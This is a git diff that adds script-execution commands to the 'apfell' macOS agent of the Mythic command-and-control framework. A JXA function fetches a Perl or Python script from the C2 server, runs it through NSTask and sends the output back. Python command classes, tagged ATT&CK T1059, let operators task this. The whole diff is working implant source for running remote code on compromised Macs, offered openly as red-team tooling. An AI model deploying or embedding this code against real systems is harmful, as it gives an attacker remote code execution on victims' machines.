MythicAgents
diff --git a/‎Payload_Type/apfell/apfell/agent_code/run_script.js‎
Lines changed: 62 additions & 0 deletions b/‎Payload_Type/apfell/apfell/agent_code/run_script.js‎
Lines changed: 62 additions & 0 deletions
diff --git a/‎Payload_Type/apfell/apfell/agent_functions/run_perl.py‎
Lines changed: 139 additions & 0 deletions b/‎Payload_Type/apfell/apfell/agent_functions/run_perl.py‎
Lines changed: 139 additions & 0 deletions
diff --git a/‎Payload_Type/apfell/apfell/agent_functions/run_python.py‎
Lines changed: 139 additions & 0 deletions b/‎Payload_Type/apfell/apfell/agent_functions/run_python.py‎
Lines changed: 139 additions & 0 deletions
@@ -0,0 +1,62 @@
+exports.run_script = function(task, command, params){
+    //Parse JSON to retrieve input
+    try {
+        let config = JSON.parse(params);
+        let program_path = "/usr/bin/python3";
+        let script = "";
+        let args = [];
+        if(config.hasOwnProperty("file")){
+            let script_data = C2.upload(task, config['file']);
+            if(typeof script_data === "string"){
+                return{"user_output":"Failed to get contents of file\n" + script_data, "completed": true, "status": "error"};
+            }
+            script = $.NSString.alloc.initWithDataEncoding(script_data, $.NSUTF8StringEncoding);
+        } else {
+            return {"user_output": "missing file parameter", "completed": true, "status": "error"}
+        }
+        if(config.hasOwnProperty("interpreter")){
+            program_path = config["interpreter"];
+        }
+        if(config.hasOwnProperty("args")){
+            args = config["args"];
+        }
+        let inputData = script.dataUsingEncoding($.NSUTF8StringEncoding);
+        // Prepare NSTask
+        let script_task = $.NSTask.alloc.init;
+        script_task.setLaunchPath(program_path);
+        script_task.setArguments(args);
+
+        // Set up input and output pipes
+        const inputPipe = $.NSPipe.pipe;
+        const outputPipe = $.NSPipe.pipe;
+        const errorPipe = $.NSPipe.pipe;
+
+        script_task.setStandardInput(inputPipe);
+        script_task.setStandardOutput(outputPipe);
+        script_task.setStandardError(errorPipe);
+
+        // Write input to the process
+        const inputHandle = inputPipe.fileHandleForWriting;
+        inputHandle.writeData(inputData);
+        inputHandle.closeFile;
+
+        // Launch task
+        script_task.launch;
+        script_task.waitUntilExit;
+
+        // Read output
+        const outputHandle = outputPipe.fileHandleForReading;
+        const errorHandle = errorPipe.fileHandleForReading;
+        const outputData = outputHandle.readDataToEndOfFile;
+        const errorData = errorHandle.readDataToEndOfFile;
+        const outputString = $.NSString.alloc.initWithDataEncoding(outputData, $.NSUTF8StringEncoding);
+        const errorString = $.NSString.alloc.initWithDataEncoding(errorData, $.NSUTF8StringEncoding);
+        // Aggregate Response
+        let response1py = ObjC.unwrap(outputString);
+        let response2py = ObjC.unwrap(errorString);
+        let responsepy = response1py + response2py;
+        return {"user_output":responsepy, "completed": true};
+     }catch(error){
+        return {"user_output":error.toString(), "completed": true, "status": "error"};
+    }
+}
@@ -0,0 +1,139 @@
+from mythic_container.MythicCommandBase import *
+import json
+from mythic_container.MythicRPC import *
+
+class RunPerlArguments(TaskArguments):
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
+        self.args = [
+            CommandParameter(
+                name="file",
+                cli_name="file",
+                display_name="Script to Run", 
+                type=ParameterType.File, 
+                description="Select perl script to run",
+                parameter_group_info=[ 
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Default",
+                        ui_position=0
+                    )
+                ]
+            ),
+            CommandParameter(
+                name="filename",
+                cli_name="filename",
+                display_name="Name of an already uploaded file to Mythic to execute",
+                type=ParameterType.String,
+                dynamic_query_function=self.get_files,
+                description="Run a script via stdin for a given process",
+                parameter_group_info=[
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Existing File",
+                        ui_position=0
+                    )
+                ]
+            ),
+        ]
+
+    async def parse_arguments(self):
+        if len(self.command_line) == 0:
+            raise ValueError("Must supply arguments")
+
+    async def parse_dictionary(self, dictionary_arguments):
+        self.load_args_from_dictionary(dictionary_arguments)
+
+    async def get_files(self, callback: PTRPCDynamicQueryFunctionMessage) -> PTRPCDynamicQueryFunctionMessageResponse:
+        response = PTRPCDynamicQueryFunctionMessageResponse()
+        file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage(
+            CallbackID=callback.Callback,
+            LimitByCallback=False,
+            IsDownloadFromAgent=False,
+            IsScreenshot=False,
+            IsPayload=False,
+            Filename="",
+        ))
+        if file_resp.Success:
+            file_names = []
+            for f in file_resp.Files:
+                if f.Filename not in file_names and f.Filename.endswith(".pl"):
+                    file_names.append(f.Filename)
+            response.Success = True
+            response.Choices = file_names
+            return response
+        else:
+            await SendMythicRPCOperationEventLogCreate(MythicRPCOperationEventLogCreateMessage(
+                CallbackId=callback.Callback,
+                Message=f"Failed to get files: {file_resp.Error}",
+                MessageLevel="warning"
+            ))
+            response.Error = f"Failed to get files: {file_resp.Error}"
+            return response
+
+
+class RunPerlCommand(CommandBase):
+    cmd = "run_perl"
+    needs_admin = False
+    help_cmd = "run_perl -filename program.pl"
+    description = "The command uses the ObjectiveC bridge to spawn perl and capture standard input. The supplied script is passed to the new perl process, evaluated, and the output is returned."
+    version = 1
+    supported_ui_features = []
+    author = "@robot"
+    attackmapping = ["T1059"]
+    argument_class = RunPerlArguments
+    attributes = CommandAttributes(
+        supported_os=[SupportedOS.MacOS],
+        dependencies=["run_script"]
+    )
+
+    async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse:
+        response = MythicCommandBase.PTTaskCreateTaskingMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+        )
+        try:
+            groupName = taskData.args.get_parameter_group_name()
+            if groupName == "Existing File":
+                # we're trying to find an already existing file and use that
+                file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage(
+                    TaskID=taskData.Task.ID,
+                    Filename=taskData.args.get_arg("filename"),
+                    LimitByCallback=False,
+                    MaxResults=1
+                ))
+                if file_resp.Success:
+                    if len(file_resp.Files) > 0:
+                        taskData.args.add_arg("file", file_resp.Files[0].AgentFileId)
+                        taskData.args.remove_arg("filename")
+                        response.DisplayParams = f"-filename {file_resp.Files[0].Filename}"
+                    elif len(file_resp.Files) == 0:
+                        raise Exception("Failed to find the named file. Have you uploaded it before? Did it get deleted?")
+                else:
+                    raise Exception("Error from Mythic trying to search files:\n" + str(file_resp.Error))
+            else:
+                file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage(
+                    TaskID=taskData.Task.ID,
+                    AgentFileID=taskData.args.get_arg("file"),
+                    LimitByCallback=False,
+                    MaxResults=1
+                ))
+                if file_resp.Success:
+                    if len(file_resp.Files) > 0:
+                        taskData.args.add_arg("file", file_resp.Files[0].AgentFileId)
+                        taskData.args.remove_arg("filename")
+                        response.DisplayParams = f"-filename {file_resp.Files[0].Filename}"
+                    elif len(file_resp.Files) == 0:
+                        raise Exception("Failed to find the named file. Have you uploaded it before? Did it get deleted?")
+                else:
+                    raise Exception("Error from Mythic trying to search files:\n" + str(file_resp.Error))
+            taskData.args.add_arg("interpreter", "/usr/bin/perl")
+            taskData.args.add_arg("args", type=ParameterType.Array, value=[])
+            response.CommandName = "run_script"
+        except Exception as e:
+            raise Exception("Error from Mythic: " + str(sys.exc_info()[-1].tb_lineno) + " : " + str(e))
+        return response
+
+    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
+        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
+        return resp
@@ -0,0 +1,139 @@
+from mythic_container.MythicCommandBase import *
+import json
+from mythic_container.MythicRPC import *
+
+class RunPythonArguments(TaskArguments):
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
+        self.args = [
+            CommandParameter(
+                name="file",
+                cli_name="file",
+                display_name="Script to Run",
+                type=ParameterType.File,
+                description="Select python script to run",
+                parameter_group_info=[
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Default",
+                        ui_position=0
+                    )
+                ]
+            ),
+            CommandParameter(
+                name="filename",
+                cli_name="filename",
+                display_name="Name of an already uploaded file to Mythic to execute",
+                type=ParameterType.String,
+                dynamic_query_function=self.get_files,
+                description="Run a script via stdin for a given process",
+                parameter_group_info=[
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Existing File",
+                        ui_position=0
+                    )
+                ]
+            ),
+        ]
+
+    async def parse_arguments(self):
+        if len(self.command_line) == 0:
+            raise ValueError("Must supply arguments")
+
+    async def parse_dictionary(self, dictionary_arguments):
+        self.load_args_from_dictionary(dictionary_arguments)
+
+    async def get_files(self, callback: PTRPCDynamicQueryFunctionMessage) -> PTRPCDynamicQueryFunctionMessageResponse:
+        response = PTRPCDynamicQueryFunctionMessageResponse()
+        file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage(
+            CallbackID=callback.Callback,
+            LimitByCallback=False,
+            IsDownloadFromAgent=False,
+            IsScreenshot=False,
+            IsPayload=False,
+            Filename="",
+        ))
+        if file_resp.Success:
+            file_names = []
+            for f in file_resp.Files:
+                if f.Filename not in file_names and f.Filename.endswith(".py"):
+                    file_names.append(f.Filename)
+            response.Success = True
+            response.Choices = file_names
+            return response
+        else:
+            await SendMythicRPCOperationEventLogCreate(MythicRPCOperationEventLogCreateMessage(
+                CallbackId=callback.Callback,
+                Message=f"Failed to get files: {file_resp.Error}",
+                MessageLevel="warning"
+            ))
+            response.Error = f"Failed to get files: {file_resp.Error}"
+            return response
+
+
+class RunPythonCommand(CommandBase):
+    cmd = "run_python"
+    needs_admin = False
+    help_cmd = "run_python -filename program.py"
+    description = "The command uses the ObjectiveC bridge to spawn python3 and capture standard input. The supplied script is passed to the new python process, evaluated, and the output is returned."
+    version = 1
+    supported_ui_features = []
+    author = "@robot"
+    attackmapping = ["T1059"]
+    argument_class = RunPythonArguments
+    attributes = CommandAttributes(
+        supported_os=[SupportedOS.MacOS],
+        dependencies=["run_script"]
+    )
+
+    async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse:
+        response = MythicCommandBase.PTTaskCreateTaskingMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+        )
+        try:
+            groupName = taskData.args.get_parameter_group_name()
+            if groupName == "Existing File":
+                # we're trying to find an already existing file and use that
+                file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage(
+                    TaskID=taskData.Task.ID,
+                    Filename=taskData.args.get_arg("filename"),
+                    LimitByCallback=False,
+                    MaxResults=1
+                ))
+                if file_resp.Success:
+                    if len(file_resp.Files) > 0:
+                        taskData.args.add_arg("file", file_resp.Files[0].AgentFileId)
+                        taskData.args.remove_arg("filename")
+                        response.DisplayParams = f"-filename {file_resp.Files[0].Filename}"
+                    elif len(file_resp.Files) == 0:
+                        raise Exception("Failed to find the named file. Have you uploaded it before? Did it get deleted?")
+                else:
+                    raise Exception("Error from Mythic trying to search files:\n" + str(file_resp.Error))
+            else:
+                file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage(
+                    TaskID=taskData.Task.ID,
+                    AgentFileID=taskData.args.get_arg("file"),
+                    LimitByCallback=False,
+                    MaxResults=1
+                ))
+                if file_resp.Success:
+                    if len(file_resp.Files) > 0:
+                        taskData.args.add_arg("file", file_resp.Files[0].AgentFileId)
+                        taskData.args.remove_arg("filename")
+                        response.DisplayParams = f"-filename {file_resp.Files[0].Filename}"
+                    elif len(file_resp.Files) == 0:
+                        raise Exception("Failed to find the named file. Have you uploaded it before? Did it get deleted?")
+                else:
+                    raise Exception("Error from Mythic trying to search files:\n" + str(file_resp.Error))
+            taskData.args.add_arg("interpreter", "/usr/bin/python3")
+            taskData.args.add_arg("args", type=ParameterType.Array, value=[])
+            response.CommandName = "run_script"
+        except Exception as e:
+            raise Exception("Error from Mythic: " + str(sys.exc_info()[-1].tb_lineno) + " : " + str(e))
+        return response
+
+    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
+        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
+        return resp